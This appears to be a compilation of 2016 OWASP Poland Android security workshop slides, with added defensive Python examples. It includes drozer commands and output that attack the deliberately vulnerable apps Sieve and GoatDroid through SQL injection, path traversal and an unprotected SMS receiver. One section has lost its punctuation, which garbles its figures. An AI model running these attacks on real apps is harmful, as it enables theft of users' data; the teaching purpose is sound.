  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"...
• ...but how long should they REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts... 71.56 seconds
  - http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
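As an added example (not from the slides or any real app), a constructed server-side session store in Python that implements the four mitigations above: tokens come from the OS CSPRNG instead of a device ID, every lookup enforces the expiry window (30 minutes here, matching the cookie test in "how to find"), and a change of authentication state destroys the old token. The clock is injectable so the expiry behaviour can be exercised without waiting.

```python
import secrets
import time

SESSION_LIFETIME = 30 * 60  # seconds; the 30-minute window the cookie test above waits out


class SessionStore:
    """Constructed server-side session store (hypothetical, not from any real app).
    Tokens are unguessable, expiry is checked on every use, and the store never
    reuses a token across an authentication-state change."""

    def __init__(self, lifetime=SESSION_LIFETIME, clock=time.time):
        self._lifetime = lifetime
        self._clock = clock            # injectable for testing expiry
        self._sessions = {}            # token -> (user_id, expires_at)

    def create(self, user_id):
        """Issue a fresh token: 32 random bytes (256 bits) from the OS CSPRNG,
        nothing derived from the device or the user."""
        token = secrets.token_urlsafe(32)
        self._sessions[token] = (user_id, self._clock() + self._lifetime)
        return token

    def user_for(self, token):
        """Resolve a token to a user, or None if unknown or expired. Expired
        entries are deleted so a copied cookie cannot be revived later."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user_id, expires_at = entry
        if self._clock() >= expires_at:
            del self._sessions[token]
            return None
        return user_id

    def invalidate(self, token):
        """Server-side logout: the token stops working immediately, whatever
        the client still holds."""
        self._sessions.pop(token, None)

    def switch_user(self, old_token, new_user_id):
        """Authentication state changed (another user logs in on the same
        client): destroy the previous session and issue a new token."""
        self.invalidate(old_token)
        return self.create(new_user_id)

    def purge_expired(self):
        """Destroy unused sessions; returns how many were removed."""
        now = self._clock()
        dead = [t for t, (_, exp) in self._sessions.items() if exp <= now]
        for t in dead:
            del self._sessions[t]
        return len(dead)


if __name__ == "__main__":
    store = SessionStore()
    t = store.create("alice")
    print(len(t), store.user_for(t))   # 43 alice
    t2 = store.switch_user(t, "bob")
    print(store.user_for(t), store.user_for(t2))  # None bob
```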
Thank you
pawelrzepaoutlookcom
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling
  – High level – Java code
• Disassembling
  – Low level – assembly code
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling – Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows you to use any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling with Luyten
Demo: Modifying Smali files
Demo
Android fundamentals
Andrii SygidaOWASP Poland24022016
Agendabull Android Architecturebull Android security fundamentalsbull Android 60 security releasebull Google security features
Introbull Android is the worlds most popular mobile platformFeaturesbull Multi-taskingbull Widgetsbull Notificationsbull Voice Typing and Actionsbull Photos and videobull Most widely used smartphone OSbull Phones tablets Google TV and more
Statsbull There are 12 billion mobile users By 2018 that number with
be 5 billion bull Mobile adoption is growing 8x faster than traditional web
applications bull Mobile payments will exceed $90 Billion by 2017
Bugcrowd Cybersecurity Research 2015
Android Architecture
Linux Kernelbull The architecture is based on the Linux ( started from 26)
kernel bull This layer is core of android architecture It provides
service like power management memory management security etc
bull It helps in software or hardware binding for better communication
Librariesbull The next layer is the Androidrsquos native libraries bull It is this layer that enables the device to handle different types
of data bull The WebKit library is responsible for browser support SQLite is
for database FreeType for font support Media for playing and recording audio and video formats
Android Runtimebull Core librariesbull Dalvik Virtual Machinebull DVM vs JVM Differencesbull ART
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
  – Isolation
  – Privilege separation
• How sensitive data is transmitted
  – Extra-device communication
  – Inter-application communication
  – Inter-component communication
Android Application Components
[Diagram: the four component types – Activities, Services, Content providers, Broadcast receivers]
Android Application Components
AndroidManifest.xml defines how the app works and what kind of interaction between its components and the outside world is possible. Permissions are declared there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions
    <uses-permission android:name="string" />
    <permission android:protectionLevel="…" />
• Components and their attributes
[Figure: sample AndroidManifest.xml]
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects the user or their data; the user has to grant it)
• normal – minimal risk (default value; granted automatically at install)
• signature – granted only to apps signed with the same certificate as the app that declared the permission
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
Security-relevant attributes:
• debuggable (set on <application>)
• enabled
• exported
• permission
[Diagram: example attributes on Activities, Services, Content providers and Broadcast receivers]
Intents
An intent is a messaging object that is created and delivered to an intended application component. It carries all relevant information about the calling application, the desired target component and the requested action and data. An explicit intent names the target component, as below:

    import android.content.ComponentName;
    import android.content.Intent;
    import android.net.Uri;

    Intent intent = new Intent(Intent.ACTION_VIEW);
    intent.setData(Uri.parse("http://www.google.com"));
    String pack = "com.android.browser";
    ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
    intent.setComponent(comp);
    startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC – the leading security assessment framework for Android.
Manual on installation and usage: the drozer user guide (see references).
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
    dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer comes preinstalled in the AppUse VM together with adb, so it is essentially „click-and-play".
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app.
Activities
Activity components attacks
• If an activity can be triggered by other apps (i.e. by an attacker), it can be abused.
• By launching it with intents it is possible to:
  – modify data in the background
  – trick the user
  – leak sensitive information
Activity components attacks
• General hijacking scheme (an implicit intent meant for one app's Activity is received instead by another app that declares a matching intent filter)
• Results of an attack:
  – A malicious Activity could read the data in the Intent and then immediately relay it to the legitimate one
  – Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
[Diagram: hijacking scheme between apps A, B and E]
Activity components attacks
• List and launch exported activities:
    dz> run app.activity.info -a com.mwr.example.sieve
    Package: com.mwr.example.sieve
      com.mwr.example.sieve.FileSelectActivity
      com.mwr.example.sieve.MainLoginActivity
      com.mwr.example.sieve.PWList
    dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file.
Services attacks
Although services generally don't look dangerous, they can perform sensitive operations.
To attack a service you need a way to interact with it: it must be exported, or it must accept input from some other channel such as intents, files or the network stack.
Services attacks
Typical attacks: denial of service and information leakage.
• Find exported services
• Launch them one by one with logcat running to check for sensitive info
• Fire off intents and wait for the result
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: through a content provider, any app holding the READ_SMS permission can read SMS from the built-in SMS app's repository on the device.
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions. List the providers that require no permission at all:
    run app.provider.info --permission null
Content providers attacks
• Unrestricted access to the app database – just query it:
    run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Beyond reading, attacks may also alter data, e.g. using the app.provider.insert command.
    dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to app database
    dz> run scanner.provider.finduris -a com.mwr.example.sieve
    Accessible content URIs:
      content://com.mwr.example.sieve.DBContentProvider/Keys
      content://com.mwr.example.sieve.DBContentProvider/Passwords
      content://com.mwr.example.sieve.DBContentProvider/Passwords/
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --vertical
Content providers attacks
• SQL injection
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --selection "'"
    unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "* FROM Key--"
    | Password         | pin  |
    | thisismypassword | 9876 |
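To see why those two drozer queries behave as they do, here is an added example in Python (not from the talk, and not Sieve's real code) that reproduces the provider's mistake against an in-memory SQLite database: the caller's projection and selection are concatenated into SELECT <projection> FROM Passwords WHERE (<selection>), the shape SQLiteQueryBuilder produces when the provider validates nothing. The table layout, the Key table and its single row are constructed to match the drozer output above; a hardened variant with a column whitelist and a bound parameter sits next to it.

```python
import sqlite3


# Constructed in-memory database modelled loosely on the Sieve app's schema
# (table and column names are assumptions, not taken from the real app).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, "
               "username TEXT, password TEXT, email TEXT)")
    db.execute("CREATE TABLE Key (Password TEXT, pin TEXT)")
    db.execute("INSERT INTO Passwords VALUES (1, 'Gmail', 'alice', 's3cr3t', 'alice@example.com')")
    db.execute("INSERT INTO Key VALUES ('thisismypassword', '9876')")
    return db


def vulnerable_query(db, projection=None, selection=None):
    """Mirrors a provider that hands the caller's projection and selection to
    SQLiteQueryBuilder untouched: the statement becomes
    SELECT <projection> FROM Passwords WHERE (<selection>)."""
    columns = ", ".join(projection) if projection else "*"
    sql = f"SELECT {columns} FROM Passwords"
    if selection:
        sql += f" WHERE ({selection})"
    return sql, db.execute(sql).fetchall()


ALLOWED_COLUMNS = {"_id", "service", "username", "password", "email"}


def hardened_query(db, projection=None, column=None, value=None):
    """Same provider with a projection map and a fixed, parameterised selection:
    callers pick only from known columns and never supply raw SQL."""
    projection = list(projection or sorted(ALLOWED_COLUMNS))
    unknown = [c for c in projection if c not in ALLOWED_COLUMNS]
    if unknown:
        raise ValueError(f"unknown column(s) in projection: {unknown}")
    sql = f"SELECT {', '.join(projection)} FROM Passwords"
    args = ()
    if column is not None:
        if column not in ALLOWED_COLUMNS:
            raise ValueError(f"unknown selection column: {column}")
        sql += f" WHERE {column} = ?"   # the value travels as a bound parameter
        args = (value,)
    return sql, db.execute(sql, args).fetchall()


def demo():
    db = make_db()
    # --selection "'" : the unbalanced quote breaks the statement, as the drozer error shows
    try:
        vulnerable_query(db, selection="'")
        broke = False
    except sqlite3.OperationalError:
        broke = True
    # --projection "* FROM Key--" : comments out the real FROM clause and dumps the Key table
    sql, rows = vulnerable_query(db, projection=["* FROM Key--"])
    # the hardened provider refuses the same projection outright
    try:
        hardened_query(db, projection=["* FROM Key--"])
        rejected = False
    except ValueError:
        rejected = True
    _, safe_rows = hardened_query(db, ["username", "password"], "service", "Gmail")
    return {"quote_breaks_statement": broke, "injected_sql": sql,
            "leaked_key_rows": rows, "hardened_rejects": rejected, "safe_rows": safe_rows}


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val}")
```

On a real provider the same fix is a projection map plus SQLiteQueryBuilder.setStrict(true) and selectionArgs; the point is that every string reaching the SQL text comes from the provider's own whitelist, never from the calling app.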
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
    dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
    127.0.0.1 localhost
    dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
    Written 24576 bytes
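The FileBackupProvider read works because the provider opens whatever path the content URI carries. The added Python example below (not the workshop's or Sieve's code) contrasts that with an openFile that confines requests to one backup directory using canonical paths; the directory layout it builds in a temp dir, including a symlink pointing back outside, is constructed for the demo.

```python
import os
import tempfile


def vulnerable_open(uri_path):
    """Sieve-style FileBackupProvider.openFile: the URI path is used as-is, so
    content://.../etc/hosts hands the caller any file the app's UID can read."""
    with open(uri_path, "rb") as f:
        return f.read()


def hardened_open(backup_dir, uri_path):
    """Resolve the request inside one allowed directory and refuse anything that
    escapes it, whether via '..' segments or symlinks (realpath follows both)."""
    base = os.path.realpath(backup_dir)
    target = os.path.realpath(os.path.join(base, uri_path.lstrip("/")))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path escapes backup directory: {uri_path}")
    with open(target, "rb") as f:
        return f.read()


def demo():
    """Constructed layout (hypothetical, built in a temp dir):
    <root>/backups/database.db  - the only file the provider should serve
    <root>/secret.txt           - outside the backup dir
    <root>/backups/link         - symlink pointing back out to secret.txt"""
    root = tempfile.mkdtemp()
    backups = os.path.join(root, "backups")
    os.mkdir(backups)
    with open(os.path.join(backups, "database.db"), "wb") as f:
        f.write(b"sqlite data")
    secret = os.path.join(root, "secret.txt")
    with open(secret, "wb") as f:
        f.write(b"127.0.0.1 localhost")
    os.symlink(secret, os.path.join(backups, "link"))

    results = {"vulnerable_reads_outside": vulnerable_open(secret) == b"127.0.0.1 localhost",
               "hardened_serves_backup": hardened_open(backups, "/database.db") == b"sqlite data"}
    for probe in ("/../secret.txt", "/link", "../../" + secret.lstrip("/")):
        try:
            hardened_open(backups, probe)
            results[probe] = "allowed"
        except PermissionError:
            results[probe] = "blocked"
    return results


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val}")
```

Checking the canonical path rather than the string the caller sent is what defeats both the `..` and the symlink variant; a prefix check on the raw string would pass `/backups/../secret.txt` and the symlink alike.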
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as battery low, boot completed, headset plugged in, etc. Although most broadcasts originate from the system, applications can also send broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk.
Broadcast receivers attacks
Typical fail: missing authorization.
• Enumerate receivers
• Determine how the receiver handles the action
• Send the intent and enjoy
Broadcast receivers attacks
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
        <intent-filter>
            <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
        </intent-filter>
    </receiver>
    …
    <uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid. The intent filter makes the receiver exported by default, and no android:permission guards it.
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
    public void onReceive(Context arg0, Intent arg1) {
        context = arg0;
        SmsManager sms = SmsManager.getDefault();
        Bundle bundle = arg1.getExtras();
        sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
        Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
    }
Broadcast receivers attacks
    run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all of the above:
• Set the android:exported attribute to false (then only code running under the same user ID as the app, i.e. the app itself, can reach the component)
• Limit access with a permission on the component (a custom permission with protectionLevel signature, or a system permission such as RECEIVE_SMS where appropriate)
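The checks behind the attributes slide, the protection-level slide, the GoatDroid receiver and the two defenses above can be scripted. The following Python script is an added example, not code from the workshop or from drozer: it reads a decoded (text) AndroidManifest.xml, such as apktool produces, applies Android's export rules (an explicit android:exported wins; otherwise activities, services and receivers are exported exactly when they declare an intent filter, and providers default to exported unless both minSdkVersion and targetSdkVersion are 17 or higher) and flags exported components that carry no android:permission or are guarded by a permission whose protectionLevel is normal or dangerous, which any app can request. The sample manifest, the package name com.example.demoapp and its permission names are constructed for the demo; only the receiver mirrors the GoatDroid declaration shown earlier.

```python
import xml.etree.ElementTree as ET

# Namespace of every android:* attribute in a manifest.
ANDROID = "{http://schemas.android.com/apk/res/android}"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample manifest (not from Sieve or GoatDroid): the receiver is
# modelled on the GoatDroid SendSMSNowReceiver, everything else is invented to
# exercise each rule. Package and permission names are hypothetical.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.demoapp">
    <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="16" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <permission android:name="com.example.demoapp.permission.WEAK"
        android:protectionLevel="normal" />
    <permission android:name="com.example.demoapp.permission.STRONG"
        android:protectionLevel="signature" />
    <application android:debuggable="true">
        <activity android:name=".MainLoginActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity android:name=".PWList" android:exported="false" />
        <receiver android:name=".broadcastreceivers.SendSMSNowReceiver">
            <intent-filter>
                <action android:name="com.example.demoapp.SOCIAL_SMS" />
            </intent-filter>
        </receiver>
        <service android:name=".SyncService" android:exported="true"
            android:permission="com.example.demoapp.permission.WEAK" />
        <service android:name=".AdminService" android:exported="true"
            android:permission="com.example.demoapp.permission.STRONG" />
        <provider android:name=".DBContentProvider"
            android:authorities="com.example.demoapp.DBContentProvider" />
    </application>
</manifest>
"""


def attr(el, name, default=None):
    return el.get(ANDROID + name, default)


def is_exported(component, provider_default):
    """Android's rule: an explicit android:exported wins; otherwise activities,
    services and receivers are exported iff they declare an <intent-filter>,
    and providers fall back to the SDK-version dependent default."""
    explicit = attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if component.tag == "provider":
        return provider_default
    return component.find("intent-filter") is not None


def audit_manifest(xml_text):
    """Return (component, problem) pairs for components reachable by other apps."""
    root = ET.fromstring(xml_text)
    sdk = root.find("uses-sdk")
    min_sdk = int(attr(sdk, "minSdkVersion", "1")) if sdk is not None else 1
    target_sdk = int(attr(sdk, "targetSdkVersion", str(min_sdk))) if sdk is not None else min_sdk
    # Providers are exported by default unless both minSdk and targetSdk are >= 17.
    provider_default = min_sdk < 17 or target_sdk < 17
    # Base protection level of every permission this app declares ("signature|privileged" -> "signature").
    levels = {attr(p, "name"): attr(p, "protectionLevel", "normal").split("|")[0]
              for p in root.iter("permission")}
    findings = []
    app = root.find("application")
    if app is None:
        return findings
    if attr(app, "debuggable") == "true":
        findings.append(("application", "android:debuggable=true lets anyone with adb run code as this app"))
    for comp in app.iter():
        if comp.tag not in COMPONENT_TAGS or not is_exported(comp, provider_default):
            continue
        name = attr(comp, "name")
        perm = attr(comp, "permission")
        if comp.tag == "provider":
            perm = perm or attr(comp, "readPermission") or attr(comp, "writePermission")
        # The launcher activity has to be exported; do not report it.
        launcher = comp.tag == "activity" and any(
            attr(c, "name") == "android.intent.category.LAUNCHER" for c in comp.iter("category"))
        if perm is None and not launcher:
            findings.append((name, f"exported {comp.tag} with no android:permission: any app can reach it"))
        elif perm is not None and levels.get(perm) in ("normal", "dangerous"):
            findings.append((name, f"exported {comp.tag} guarded by {perm} "
                                   f"(protectionLevel {levels[perm]}): any app can request that permission"))
    return findings


if __name__ == "__main__":
    for component, problem in audit_manifest(SAMPLE_MANIFEST):
        print(f"{component}: {problem}")
```

Run it against the decoded manifest of the app under test; everything it reports is a candidate for the drozer commands in this section. It does not parse binary AXML, and it treats a permission the app does not declare itself (a system permission, or one owned by another package) as acceptable, so those still deserve a manual look.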
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting related to the topic, feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or a reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the SD card before and after installing the application
• Analyze the package files at different stages:
    adb pull /data/data/<apk_package_name>
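Once the package directory has been pulled, the review in the bullets above is mechanical. The Python script below is an added example, not part of the talk: it walks a pulled /data/data/<package> tree, reports files whose mode bits make them world-readable (what MODE_WORLD_READABLE produces) and greps text and SQLite files for credential-looking keys. The sample tree, its file names, permissions and contents are constructed to exercise each rule; the regex list is a starting point, not an exhaustive one.

```python
import os
import re
import stat
import tempfile

# Patterns that usually mean a credential or token landed on disk in clear text
# (constructed list; tune it per application).
SECRET_PATTERNS = [
    re.compile(rb'(?i)(password|passwd|pwd)\s*[=:"]'),
    re.compile(rb'(?i)(api[_-]?key|auth[_-]?token|access[_-]?token|secret)\s*[=:"]'),
    re.compile(rb'(?i)name="(password|token)"'),   # shared_prefs <string name="password">
]


def scan_app_data(data_dir):
    """Walk a pulled /data/data/<package> tree and report files that other apps
    could read (world-readable mode bits) or that contain clear-text secrets."""
    findings = []
    for dirpath, _, filenames in os.walk(data_dir):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, data_dir)
            mode = os.lstat(path).st_mode
            if mode & stat.S_IROTH:
                findings.append((rel, "world-readable (%o)" % stat.S_IMODE(mode)))
            try:
                with open(path, "rb") as f:
                    head = f.read(64 * 1024)      # first 64 KiB covers prefs and config files
            except OSError:
                continue
            # Skip binaries, but keep grepping SQLite files: strings live in them unencrypted.
            if b"\x00" in head[:512] and not head.startswith(b"SQLite format 3\x00"):
                continue
            for pat in SECRET_PATTERNS:
                m = pat.search(head)
                if m:
                    findings.append((rel, f"clear-text secret near offset {m.start()}: {m.group(0)[:40]!r}"))
                    break
    return sorted(findings)


def build_sample_tree():
    """Constructed layout imitating a pulled app directory (hypothetical content)."""
    root = tempfile.mkdtemp()
    files = {
        "shared_prefs/com.example.app_preferences.xml":
            (0o664, b'<?xml version="1.0"?>\n<map>\n<string name="password">hunter2</string>\n</map>\n'),
        "files/session.json": (0o600, b'{"auth_token": "eyJhbGciOi..."}'),
        "databases/app.db": (0o660, b"SQLite format 3\x00" + b"\x00" * 100 + b"password=plaintext"),
        "cache/image.bin": (0o600, b"\x89PNG\r\n\x1a\n" + b"\x00" * 32),
    }
    for rel, (mode, content) in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(content)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for rel, problem in scan_app_data(build_sample_tree()):
        print(f"{rel}: {problem}")
```

Note that `adb pull` does not preserve the on-device mode bits, so for the permission check run the script on the device itself (or compare against `ls -l` output from an adb shell); the content checks work on the pulled copy.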
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (e.g. DevicePolicyManager.setStorageEncryption for device-level storage encryption)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure shared preferences are NOT opened with MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, „incorrectly"?
• Insecure implementations are:
  – Using known weak protocol versions or ciphers (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is done on the browser's side
• It is done via a „chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
    if (presented_cert == pinned_cert)
        start_connection();
    else
        drop_connection();
Cert Pinning - reality
• Researchers from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection – how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use MalloDroid:
    mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
    sslyze --regular www.example.com:443
Insufficient transport layer protection – example
Insufficient transport layer protection – a few facts from reality
• According to FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store:
